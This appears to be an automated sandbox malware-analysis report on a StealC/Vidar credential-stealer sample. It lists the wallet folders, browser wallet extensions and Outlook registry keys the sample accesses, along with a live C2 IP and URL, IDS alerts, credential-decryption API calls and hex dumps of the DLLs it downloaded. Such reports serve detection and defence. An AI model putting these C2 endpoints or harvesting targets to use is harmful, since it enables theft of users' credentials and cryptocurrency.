Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1411403203.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/0d60be0de163924d/nss3.dlly	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpdowsApps	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/b	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php.dllA	Avira URL Cloud: Label: malware
Source: http://185.215.113.37	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpimple-storage.json	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll0	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpw	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phption:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpa	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpGDHJDHDAFHJJKJEHC	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dllV	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll8	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpZ	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll5.113.37	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpB	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php?	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dllJ	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpH	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php.	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllA	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php4	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php3	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpwser	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dllg	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php#	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dlll	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.file.exe.760000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: 0.2.file.exe.760000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00769B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00769B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0076C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00767240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00767240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00769AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00769AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00778EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00778EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6CBA6C80

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00774910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00774910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0076DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0076E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0076BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_007616D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0076F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00773EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00773EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_007738B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00774570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00774570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0076ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0076DE10

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.8:49705
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.8:49705
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49705 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 00:40:11 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 00:40:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 00:40:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 